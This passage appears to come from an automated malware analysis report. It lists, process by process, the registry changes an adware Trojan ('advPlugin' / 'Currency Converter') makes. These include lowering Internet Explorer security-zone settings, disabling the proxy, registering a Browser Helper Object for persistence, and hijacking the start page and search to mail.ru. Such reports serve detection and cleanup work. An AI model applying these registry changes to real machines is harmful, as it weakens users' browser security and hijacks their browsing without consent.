[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecisionTime" = "F9 9E 9F 1F 4C 4F D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecisionTime" = "F9 9E 9F 1F 4C 4F D0 01"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process BackgroundSingleton.exe:3248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"CurrentLevel" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA55B059-DD34-476A-B0D9-C48B8EE69357}]
"AppName" = "BackgroundSingleton.exe"

[HKCR\Interface\{E2256A26-B878-4B3E-A62E-993166E36C1D}\TypeLib]
"(Default)" = "{A94BA89E-1DD7-4087-9755-B5C27CBBE8B9}"

[HKCR\Interface\{E2256A26-B878-4B3E-A62E-993166E36C1D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{94E3D3E1-9FBB-4213-A380-6024DDC55ABF}]
"(Default)" = "IBackgroundSingleton"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1406" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA55B059-DD34-476A-B0D9-C48B8EE69357}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"Flags" = "219"

[HKCR\Interface\{94E3D3E1-9FBB-4213-A380-6024DDC55ABF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{94E3D3E1-9FBB-4213-A380-6024DDC55ABF}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{94E3D3E1-9FBB-4213-A380-6024DDC55ABF}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1406" = "0"

[HKCR\TypeLib\{A94BA89E-1DD7-4087-9755-B5C27CBBE8B9}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"CurrentLevel" = "0"

[HKCR\Wow6432Node\CLSID\{FA55B059-DD34-476A-B0D9-C48B8EE69357}]
"(Default)" = "BackgroundScriptEngine Class"

[HKCR\Wow6432Node\Interface\{E2256A26-B878-4B3E-A62E-993166E36C1D}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"BackgroundSingleton.exe" = "9999"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA55B059-DD34-476A-B0D9-C48B8EE69357}]
"AppPath" = "%Program Files% (x86)\advPlugin"

[HKCR\Wow6432Node\Interface\{E2256A26-B878-4B3E-A62E-993166E36C1D}\TypeLib]
"(Default)" = "{A94BA89E-1DD7-4087-9755-B5C27CBBE8B9}"

[HKCR\TypeLib\{A94BA89E-1DD7-4087-9755-B5C27CBBE8B9}\1.0]
"(Default)" = "BackgroundSingleton 1.0 Type Library"

[HKCR\TypeLib\{A94BA89E-1DD7-4087-9755-B5C27CBBE8B9}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\advPlugin\BackgroundSingleton.exe"

[HKCR\Wow6432Node\Interface\{E2256A26-B878-4B3E-A62E-993166E36C1D}]
"(Default)" = "_IBackgroundSingletonEvents"

[HKCR\Interface\{94E3D3E1-9FBB-4213-A380-6024DDC55ABF}\TypeLib]
"(Default)" = "{A94BA89E-1DD7-4087-9755-B5C27CBBE8B9}"

[HKCR\Wow6432Node\Interface\{94E3D3E1-9FBB-4213-A380-6024DDC55ABF}\TypeLib]
"(Default)" = "{A94BA89E-1DD7-4087-9755-B5C27CBBE8B9}"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA55B059-DD34-476A-B0D9-C48B8EE69357}]
"Policy" = "3"

[HKCR\Wow6432Node\Interface\{E2256A26-B878-4B3E-A62E-993166E36C1D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{E2256A26-B878-4B3E-A62E-993166E36C1D}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"Flags" = "219"

[HKCR\Interface\{E2256A26-B878-4B3E-A62E-993166E36C1D}]
"(Default)" = "_IBackgroundSingletonEvents"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA55B059-DD34-476A-B0D9-C48B8EE69357}]
"AppName" = "BackgroundSingleton.exe"

[HKCR\Wow6432Node\Interface\{94E3D3E1-9FBB-4213-A380-6024DDC55ABF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{94E3D3E1-9FBB-4213-A380-6024DDC55ABF}]
"(Default)" = "IBackgroundSingleton"

[HKCR\Wow6432Node\CLSID\{FA55B059-DD34-476A-B0D9-C48B8EE69357}\Programmable]
"(Default)" = ""

[HKCR\TypeLib\{A94BA89E-1DD7-4087-9755-B5C27CBBE8B9}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\advPlugin"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA55B059-DD34-476A-B0D9-C48B8EE69357}]
"AppPath" = "%Program Files% (x86)\advPlugin"

[HKCR\Wow6432Node\CLSID\{FA55B059-DD34-476A-B0D9-C48B8EE69357}\LocalServer32]
"(Default)" = "%Program Files% (x86)\advPlugin\BackgroundSingleton.exe"

The process cscript.exe:3508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"Favorites" = "00 7C 01 00 00 14 00 1F 80 C8 27 34 1F 10 5C 10"

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E\@C:\Windows\system32]
"FXSRESM.dll,-120" = "Fax recipient"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesChanges" = "8"

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E]
"@sendmail.dll,-21" = "Desktop (create shortcut)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesResolve" = "CC 02 00 00 4C 00 00 00 01 14 02 00 00 00 00 00"
"FavoritesVersion" = "2"

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E]
"@zipfldr.dll,-10148" = "Compressed (zipped) folder"
"@sendmail.dll,-4" = "Mail recipient"

The process opera_autoupdate.exe:3696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Opera Software]
"Attempts" = "1"
"uuid" = "r7osSXRax/IeUgRGOwOQlNDRLmARmYzfVlECxmwHYa0NvuM4"
"lut" = "1424683896"

The process opera_autoupdate.exe:2588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Opera Software]
"Attempts" = "2"
"uuid" = "r7osSXRax/IeUgRGOwOQlNDRLmARmYzfVlECxmwHYa0NvuM4"
"lut" = "1424684139"

The process regsvr32.exe:3184 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\Approved Extensions]
"{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}" = "51 66 7A 6C 4C 1D 3B 1B 18 93 FE 03 93 F1 C1 09"

[HKCR\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"VersionIndependentProgID" = "Toolbar.ExtensionHelperObject"

[HKCR\CLSID\{7CE987D5-11B3-44FC-9C3D-03069360D462}\InprocServer32]
"(Default)" = "%Program Files% (x86)\advPlugin\Toolbar64.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"Default Visible" = "yes"
"ButtonText" = "Currency Converter"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\iexplore]
"Flags" = "0"

[HKCR\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\InprocServer32]
"(Default)" = "%Program Files% (x86)\advPlugin\Toolbar64.dll"

[HKCR\CLSID\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"(Default)" = "advPlugin"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"HotIcon" = "%Program Files% (x86)\advPlugin\icon16.ico"

[HKCR\TypeLib\{62248997-A5C9-4D90-8A1F-D537A3081E30}\1.0\0\win64]
"(Default)" = "%Program Files% (x86)\advPlugin\Toolbar64.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\iexplore]
"Type" = "3"

"Count" = "0"

[HKCR\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"TypeLib" = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"

[HKCR\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\Programmable]
"(Default)" = ""

[HKCR\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"(Default)" = "advPlugin"

[HKCR\CLSID\{7CE987D5-11B3-44FC-9C3D-03069360D462}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"ClsidExtension" = "{7CE987D5-11B3-44FC-9C3D-03069360D462}"
"Icon" = "%Program Files% (x86)\advPlugin\icon16.ico"

[HKCR\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"Progid" = "Toolbar.ExtensionHelperObject.1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"CLSID" = "{1FBA04EE-3024-11d2-8F1F-0000F87ABD16}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\iexplore]
"Time" = "DF 07 02 00 01 00 17 00 09 00 23 00 2D 00 5A 01"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry\CommandBar]
"CommandBandLayout" = "07 00 00 00 69 01 00 00 03 01 00 00 08 01 00 00"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"NoExplorer" = "1"

"(Default)" = "advPlugin"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\iexplore]

The process regsvr32.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\Approved Extensions]
"{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}" = "51 66 7A 6C 4C 1D 3B 1B 18 93 FE 03 93 F1 C1 09"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"ClsidExtension" = "{7CE987D5-11B3-44FC-9C3D-03069360D462}"
"Icon" = "%Program Files% (x86)\advPlugin\icon16.ico"

[HKCR\Interface\{72B61FC8-3D91-45BC-B65A-6ADC72579C54}\TypeLib]
"(Default)" = "{62248997-A5C9-4D90-8A1F-D537A3081E30}"

[HKCR\TypeLib\{62248997-A5C9-4D90-8A1F-D537A3081E30}\1.0]
"(Default)" = "Toolbar 1.0 Type Library"

[HKCR\TypeLib\{62248997-A5C9-4D90-8A1F-D537A3081E30}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\advPlugin\Toolbar32.dll"

[HKCR\Wow6432Node\CLSID\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"(Default)" = "advPlugin"

[HKCR\Wow6432Node\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"(Default)" = "advPlugin"

[HKCR\Wow6432Node\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\InprocServer32]
"(Default)" = "%Program Files% (x86)\advPlugin\Toolbar32.dll"

[HKCR\Wow6432Node\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\Programmable]
"(Default)" = ""

[HKCR\Wow6432Node\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"VersionIndependentProgID" = "Toolbar.ExtensionHelperObject"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"(Default)" = "advPlugin"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\iexplore]
"Flags" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"HotIcon" = "%Program Files% (x86)\advPlugin\icon16.ico"

[HKCR\Wow6432Node\Interface\{5F50F60D-73D3-4F53-A614-B18EBB0424E8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"TypeLib" = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"

[HKCR\Wow6432Node\Interface\{5F50F60D-73D3-4F53-A614-B18EBB0424E8}\TypeLib]
"(Default)" = "{62248997-A5C9-4D90-8A1F-D537A3081E30}"

[HKCR\Wow6432Node\CLSID\{7CE987D5-11B3-44FC-9C3D-03069360D462}\InprocServer32]
"(Default)" = "%Program Files% (x86)\advPlugin\Toolbar32.dll"

[HKCR\Wow6432Node\Interface\{5F50F60D-73D3-4F53-A614-B18EBB0424E8}]
"(Default)" = "IToolbarHelperObject"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\iexplore]
"Time" = "DF 07 02 00 01 00 17 00 09 00 23 00 2D 00 9F 00"

[HKCR\Interface\{72B61FC8-3D91-45BC-B65A-6ADC72579C54}]
"(Default)" = "IToolbarButton"

[HKCR\Interface\{72B61FC8-3D91-45BC-B65A-6ADC72579C54}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{62248997-A5C9-4D90-8A1F-D537A3081E30}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\advPlugin"

[HKCR\Interface\{5F50F60D-73D3-4F53-A614-B18EBB0424E8}]
"(Default)" = "IToolbarHelperObject"

[HKCU\Software\Microsoft\Internet Explorer\MINIE]
"CommandBarEnabled" = "1"

[HKCR\Interface\{72B61FC8-3D91-45BC-B65A-6ADC72579C54}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry\CommandBar]
"CommandBandLayout" = "07 00 00 00 69 01 00 00 03 01 00 00 08 01 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\iexplore]
"Type" = "3"

[HKCR\Wow6432Node\Interface\{72B61FC8-3D91-45BC-B65A-6ADC72579C54}\TypeLib]
"(Default)" = "{62248997-A5C9-4D90-8A1F-D537A3081E30}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\iexplore]
"Count" = "0"

[HKCR\Wow6432Node\Interface\{72B61FC8-3D91-45BC-B65A-6ADC72579C54}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"ButtonText" = "Currency Converter"

[HKCR\Wow6432Node\Interface\{5F50F60D-73D3-4F53-A614-B18EBB0424E8}\TypeLib]
"Version" = "1.0"

[HKCR\Wow6432Node\Interface\{72B61FC8-3D91-45BC-B65A-6ADC72579C54}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"Progid" = "Toolbar.ExtensionHelperObject.1"

[HKCR\Wow6432Node\CLSID\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Wow6432Node\Interface\{72B61FC8-3D91-45BC-B65A-6ADC72579C54}]
"(Default)" = "IToolbarButton"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"CLSID" = "{1FBA04EE-3024-11d2-8F1F-0000F87ABD16}"

[HKCR\Interface\{5F50F60D-73D3-4F53-A614-B18EBB0424E8}\TypeLib]
"(Default)" = "{62248997-A5C9-4D90-8A1F-D537A3081E30}"

[HKCR\Wow6432Node\CLSID\{7CE987D5-11B3-44FC-9C3D-03069360D462}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{7CE987D5-11B3-44FC-9C3D-03069360D462}]
"Default Visible" = "yes"

[HKCR\Interface\{5F50F60D-73D3-4F53-A614-B18EBB0424E8}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{62248997-A5C9-4D90-8A1F-D537A3081E30}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{5F50F60D-73D3-4F53-A614-B18EBB0424E8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}]
"NoExplorer" = "1"

[HKCU\Software\Microsoft\Internet Explorer\MINIE]
"ToolBarRow" = "3"

The process bAQhdcvmXpIk.exe:3192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\AppDataLow\Software\Mail.Ru\IE_Bar]
"DefBrowser" = "opnew"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{FFEBBF0A-C22C-4172-89FF-45215A135AC7}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"ShowSearchSuggestions" = "1"

[HKCU\Software\Mail.Ru\Tech\ptls\{11A1974E-9BEF-4B50-8E2F-9F25FC775BD1}\ff]
"SP" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCEQPPcvMYjJa8djIgwKko97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKCU\Software\Mail.Ru\Tech\ptls\sp]
"hp" = "gdknicmnhbaajdglbinpahhapghpakch"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"URL" = "http://go.mail.ru/search?q={SearchTerms}&fr=ntg&gp=blackbear1"

[HKCU\Software\Mail.Ru\Tech\ptls\sp]
"dse" = "jedelkhanefmcnpappfhachbpnlhomai"
"vbm" = "pganlglbhgfjfgopijbhemcpbehjnpia"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"FaviconURLFallback" = "http://go.mail.ru/favicon.ico"

[HKCU\Software\AppDataLow\Software\Mail.Ru\IE_Bar\Settings]
"Guid" = "{719968E8-AEBE-49A6-B040-FB3879941DE0}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"DisplayName" = "ÃÅ¸ÃÂ¾ÃÂ¸Ã‘ÂÃÂº@Mail.Ru"

[HKCU\Software\Mail.Ru\Tech\ptls\{A12C4AB1-F4D0-4771-8C21-613E9D12491F}\ch]
"SP" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCEQPPcvMYjJa8djIgwKk497RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://mail.ru/cnt/10445?gp=blackbear1"

[HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\jedelkhanefmcnpappfhachbpnlhomai]
"update_url" = "https://clients2.google.com/service/update2/crx"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"SuggestionsURL" = "http://suggests.go.mail.ru/ie8?q={SearchTerms}"

The Trojan deletes the following registry key(s):

[HKCU\Software\Mail.Ru\Tech\ptls\sp]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Mail.Ru\Tech\ptls\sp]
"dse"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"Deleted"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Secondary Start Pages"

The process JUR0CxdplxCY.exe:4040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\advPlugin]
"Installed" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\advPlugin]
"DisplayIcon" = "%Program Files% (x86)\advPlugin\uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\advPlugin]
"DisplayName" = "Currency calc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadNetworkName" = "Network 3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "57 47 C3 8B 4B 4F D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecision" = "0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.24.15, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\327c54aa\python.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\327c54aa\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\knig18679 xim2.zip, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\KompexSQLiteWrapper.dll,"

[HKLM\SOFTWARE\Wow6432Node\advPlugin]
"Path" = "%Program Files% (x86)\advPlugin"

[HKCU\Software\advPlugin]
"Uninstalled" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\advPlugin]
"Publisher" = ""
"UninstallString" = "%Program Files% (x86)\advPlugin\uninstall.exe"

[HKLM\SOFTWARE\Wow6432Node\advPlugin]
"Uninstalled" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\advPlugin]
"rerunbig" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\advPlugin_restartonfail"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecisionTime" = "6C A6 8A 1A 4C 4F D0 01"

[HKCU\Software\advPlugin\Components]
"Main" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\advPlugin]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\advPlugin]
"URLInfoAbout" = "http://gigabase.ru"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\advPlugin]
"Path" = "%Program Files% (x86)\advPlugin"

[HKLM\SOFTWARE\Wow6432Node\advPlugin]
"Installed" = "0"

[HKLM\SOFTWARE\Wow6432Node\advPlugin\Components]
"Main" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\advPlugin]
"DisplayVersion" = "1.2.15"
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecisionTime" = "6C A6 8A 1A 4C 4F D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

